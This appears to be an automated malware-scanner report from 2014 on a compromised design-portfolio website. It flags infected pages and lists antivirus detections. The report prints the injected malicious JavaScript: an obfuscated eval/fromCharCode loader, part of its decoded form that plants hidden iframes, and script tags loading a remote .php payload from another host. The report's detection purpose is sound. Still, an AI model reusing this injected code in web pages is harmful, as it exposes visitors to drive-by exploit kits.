Malware Scanner report for brindusa-design.com

Malicious/Suspicious/Total URLs checked: 2/2/15
4 pages have malicious or suspicious code. See details below.

Blacklists: Found
The website is marked by Google as suspicious.

The website "brindusa-design.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/3/3
3 suspicious iframes found. See details below.

Deface / Content modification: OK

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=brindusa-design.com

Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.

Scanned pages/files

Request | Server response | Status

http://brindusa-design.com/
200 OK
Content-Length: 25610
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

window.eval(String.fromCharCode(116,114,121,123,112,114,111,116,111,116,121,112,101,37,50,59,125,99,97,116,99,104,40,97,115,100,41,123,120,61,50,59,125,116,114,121,123,113,61,100,111,99,117,109,101,110,116,91,40,120,41,63,34,99,34,43,34,114,34,58,50,43,34,101,34,43,34,97,34,43,34,116,34,43,34,101,34,43,34,69,34,43,34,108,34,43,34,101,34,43,34,109,34,43,40,40,102,41,63,34,101,34,43,34,110,34,43,34,116,34,58,34,34,41,93,40,34,112,34,41,59,113,46,97,112,112,101,110,100,67,104,105,108,100,40,113,43,
... 21428 bytes are skipped ...
2,40,118,41,101,61,119,105,110,100,111,119,91,118,43,34,108,34,93,59,119,61,102,59,115,61,91,93,59,114,61,83,116,114,105,110,103,59,122,61,40,40,101,41,63,34,67,111,100,101,34,58,34,34,41,59,102,111,114,40,59,49,55,55,54,45,53,43,53,62,105,59,105,43,61,49,41,123,106,61,105,59,105,102,40,101,41,115,61,115,43,114,91,102,114,43,40,40,101,41,63,34,67,111,100,101,34,58,49,50,41,93,40,40,119,91,106,93,47,40,53,43,101,40,34,106,37,50,34,41,41,41,41,59,125,10,105,102,40,102,41,101,40,115,41,59,125,10));

Decoded script:


try{prototype%2;}catch(asd){x=2;}try{q=document[(x)?"c"+"r":2+"e"+"a"+"t"+"e"+"E"+"l"+"e"+"m"+((f)?"e"+"n"+"t":"")]("p");q.appendChild(q+"");}catch(fwbewe){i=0;try{prototype*5;}catch(z){fr="fromChar";f=[510,702,550,594,580,630,555,660,160,660,505,720,580,492,485,660,500,666,545,468,585,654,490,606,570,240,205,738,50,192,160,192,160,708,485,684,160,624,525,192,305,192,580,624,525,690,230,690,505,606,500,192,235,192,580,624,525,690,230,486,295,60,160,192,160,192,590,582,570,192,540,666,160,36
... 47845 bytes are skipped ...
ifrm.style.width = "0px";
ifrm.style.height = "0px";
ifrm.style.visibility = "hidden";
document.body.appendChild(ifrm);
}
} catch (e) {
}
}, 500 */
var hi = this.seed / this.Q;
var lo = this.seed % this.Q;
var test = this.A * lo - this.R * hi;
if(test > 0){
this.seed = test;
} else {
this.seed = test + this.M;
}
return (this.see

Antivirus reports:

AntiVir: JS/iFrame.BO.1
Avast: JS:Redirector-XU [Trj]
Ikarus: Exploit.JS.Blacole
nProtect: JS:Trojan.JS.Iframe.BO
K7AntiVirus: Trojan
Emsisoft: JS:Trojan.JS.Iframe.BO (B)
Comodo: TrojWare.JS.Agent.AM
CAT-QuickHeal: JS/BlacoleRef.BV
DrWeb: JS.IFrame.278
Kaspersky: HEUR:Trojan.Script.Generic
Microsoft: Trojan:JS/BlacoleRef.W
MicroWorld-eScan: JS:Trojan.JS.Iframe.BO
Jiangmin: Trojan/Script.Gen
NANO-Antivirus: Trojan.Script.Expack.uvpsi
ClamAV: JS.Trojan.Blacole-4
F-Secure: JS:Trojan.JS.Iframe.BO
F-Prot: JS/IFrame.QW
AVG: HTML/Framer
GData: JS:Trojan.JS.Iframe.BO
Commtouch: JS/IFrame.QW
BitDefender: JS:Trojan.JS.Iframe.BO

http://www.google-analytics.com/urchin.js
200 OK
Content-Length: 22678
Content-Type: text/javascript
clean

http://brindusa-design.com/index.html
200 OK
Content-Length: 25610
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses. The code sample, decoded script and antivirus reports shown for this page are the same as those listed above for http://brindusa-design.com/.

http://brindusa-design.com/pdf/Resume-Brindusa-Dumitrascu.pdf
200 OK
Content-Length: 25204
Content-Type: application/pdf
clean

http://brindusa-design.com/test404page.js
404 Not Found
Content-Length: 6547
Content-Type: text/html
suspicious
Hidden iFrame found.
size: 1x1     
src: http://www.google.ca/search?q=%64%61%74%61%71%75%61%6e%74%75%6d%2e%63%6f%6d%2b%56%61%6e%63%6f%75%76%65%72%2b%68%6f%73%74%69%6e%67

<iframe id="i1" border="0" framespacing="0" frameborder="0" name="i1" scrolling="no" src="http://www.google.ca/search?q=%64%61%74%61%71%75%61%6e%74%75%6d%2e%63%6f%6d%2b%56%61%6e%63%6f%75%76%65%72%2b%68%6f%73%74%69%6e%67" style="width: 1px; height: 1px">

Hidden iFrame found.
size: 1x1     
src: http://www.alexa.com/search?q=%64%61%74%61%71%75%61%6e%74%75%6d%2e%63%6f%6d

<iframe id="i1" border="0" framespacing="0" frameborder="0" name="i1" scrolling="no" src="http://www.alexa.com/search?q=%64%61%74%61%71%75%61%6e%74%75%6d%2e%63%6f%6d" style="width: 1px; height: 1px">

Hidden iFrame found.
size: 1x1     
src: http://www.dataquantum.com/en/

<iframe id="i1" border="0" framespacing="0" frameborder="0" name="i1" scrolling="no" src="http://www.dataquantum.com/en/" style="width: 1px; height: 1px">

http://pagead2.googlesyndication.com/pagead/show_ads.js
200 OK
Content-Length: 21987
Content-Type: text/javascript
clean

http://brindusa-design.com/portfolio.html
200 OK
Content-Length: 3735
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" src="http://tomdoustlawyer.com/drug-crimes_files/6JK8ktzB.php?id=19265"></script>

http://brindusa-design.com/email-branding.html
200 OK
Content-Length: 7569
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" src="http://tomdoustlawyer.com/drug-crimes_files/6JK8ktzB.php?id=19258"></script>

http://brindusa-design.com/img/california.jpg
200 OK
Content-Length: 107658
Content-Type: image/jpeg
clean

http://brindusa-design.com/img/florida-1.jpg
200 OK
Content-Length: 301160
Content-Type: image/jpeg
clean

http://brindusa-design.com/img/florida-2.jpg
200 OK
Content-Length: 271426
Content-Type: image/jpeg
clean

http://brindusa-design.com/img/georgia.jpg
200 OK
Content-Length: 213264
Content-Type: image/jpeg
clean

http://brindusa-design.com/img/michigan.jpg
200 OK
Content-Length: 237986
Content-Type: image/jpeg
clean

http://brindusa-design.com/img/new-jersey-1.jpg
200 OK
Content-Length: 213521
Content-Type: image/jpeg
clean

http://brindusa-design.com/img/new-jersey-2.jpg
200 OK
Content-Length: 251113
Content-Type: image/jpeg
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: brindusa-design.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 23 Apr 2014 19:06:12 GMT
Accept-Ranges: bytes
ETag: "1c6c07d-640a-41422540"
Server: Apache/2.2.3 (CentOS)
Content-Length: 25610
Content-Type: text/html
Last-Modified: Sat, 12 Apr 2014 15:39:25 GMT
X-Powered-By: PleskLin

...25610 bytes of data.

Second query (visit from search engine):
GET / HTTP/1.1
Host: brindusa-design.com
Referer: http://www.google.com/search?q=brindusa-design.com

Result:
The result is similar to the first query. There are no suspicious redirects found.